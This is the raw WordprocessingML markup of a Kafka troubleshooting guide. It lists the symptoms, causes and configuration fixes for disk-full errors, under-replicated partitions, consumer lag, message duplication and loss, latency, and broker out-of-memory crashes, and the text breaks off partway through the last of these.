    <w:p w14:paraId="1745887D" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC"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1. Disk Full Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6191D696"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Symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E214A8" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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lastRenderedPageBreak/>
        <w:t>Kafka brokers stop accepting messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263F348B" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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Log segments cannot be created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CF8539" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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rror logs show No space left on device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7136B58B"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Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF8D88" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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Log retention policies not configured properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4573F2" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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High throughput without log cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7DE713" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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oo many topics/partitions without log compaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0516ADC8"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Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52157818" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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Reduce log.retention.hours or log.retention.bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAD1187" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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nable log compression (compression.type=snappy/gzip).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36863598" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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Delete unused topics or old data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C2E1FB" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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xpand disk capacity or use log directories on multiple disks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30644B40" w14:textId="77777777" w:rsidR="000F58AC"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507AE42">
          <v:rect id="_x0000_i3259" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A7B3C3" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC"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2. Under-Replicated Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A80DB1"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Symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38220E93" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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kafka-topics.sh --describe shows under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D95FDFD" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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nsumers at risk of reading stale or incomplete data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3D8B8E"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Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1FACB7" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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ome brokers are down or slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C31B210" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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Network latency between brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3988D186" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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Overloaded follower brokers can't keep up with leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DAE6FB"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Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DC1B33" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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Restart failed or slow brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0C6293" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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heck and improve broker network and disk performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092E5C60" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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une:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529A807A" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="167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replica.fetch.max.bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3FAB9B" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="167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replica.lag.time.max.ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A70047" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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nsure min.insync.replicas is less than or equal to the number of available brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC24249" w14:textId="77777777" w:rsidR="000F58AC"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2B4F7EF">
          <v:rect id="_x0000_i3260" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D75E7F2" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC"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3. Slow Consumers (High Consumer Lag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F503D34"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Symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3448CB55" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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High consumer lag metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD54BE" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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essages are delayed for end users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F98E731" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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Offset lag keeps growing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EA51C4"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Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634F958E" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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nsumer processing is slower than message ingestion rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F29621E" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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oo few consumer instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A60A90" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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xpensive message processing logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F02549"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Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD31572" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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Optimize consumer logic and batch processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EA8B89" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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Increase number of consumer instances (scale out).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F7C76F" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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une consumer configs like max.poll.records and fetch.min.bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AABDCC" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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Increase thread pool or buffer sizes in consumer apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05401819" w14:textId="77777777" w:rsidR="000F58AC"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398837D">
          <v:rect id="_x0000_i3261" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E93A85" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC"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4. Message Duplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C76C613"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Symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3399A4DD" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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essages processed multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28568396" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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Downstream systems have duplicate records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A02C80B"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Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C10A76" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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roducer retries with acks=1 or acks=0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB411C" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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nsumer commits offsets before processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BDACE9"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Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649F2309" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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et acks=all and enable idempotent producer (enable.idempotence=true).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480FF98C" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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Use Exactly Once Semantics (EOS) if required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E54235" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167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lastRenderedPageBreak/>
        <w:t>Commit offsets manually only after successful processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2129B6A2" w14:textId="77777777" w:rsidR="000F58AC"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CF90909">
          <v:rect id="_x0000_i3262" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58503459" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC"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5. Message Loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F52FD3"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Symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34385DF0" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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nsumers skip or miss messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71788113" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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Gaps in message sequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FC9B48"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Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DDE9DB" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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Low replication factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43614216" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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acks=0 or acks=1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0531236F" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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nsumers fail to commit offsets or commit prematurely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4928F9D8"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Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405A6DD" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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Use acks=all + increase min.insync.replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF4C7F" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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mmit offsets only after message processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C86604E" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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et a higher replication factor for critical topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2964B5" w14:textId="77777777" w:rsidR="000F58AC"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8DC61B4">
          <v:rect id="_x0000_i3263" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71093B75" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC"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6. High Latency / Low Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3AF131"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Symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124397AE" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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essages take longer to arrive at consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461EAE80" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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roducers experience slow publish times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219387F"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Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C992B5E" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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mall batch sizes or sync sends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2176B6" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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Network or disk bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD3FB7C" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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Overloaded brokers or consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386395F2"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Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C2CD8" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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une producer settings: batch.size, linger.ms, compression.type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D142B2" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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cale brokers or upgrade to SSDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF8738B" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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Optimize consumer and broker JVM settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75755CE8" w14:textId="77777777" w:rsidR="000F58AC"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99D2283">
          <v:rect id="_x0000_i3264" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A2013" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC"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7. Broker or JVM Crashes (OOM Errors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D530B"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Symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD7942D" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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Kafka broker restarts unexpectedly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5C719E" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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Logs show OutOfMemoryError or GC pressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417F8A33"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Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E58B29" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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oo many partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05188C6C" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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Insufficient heap size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CFCDA0" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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emory leaks in producer/consumer code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5410240D"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Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43F805" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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Reduce partition count per broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8E7D81" w14:textId="77777777" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168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une JVM heap and garbage collection settings.</w:t>
      </w:r>
    </w:p>
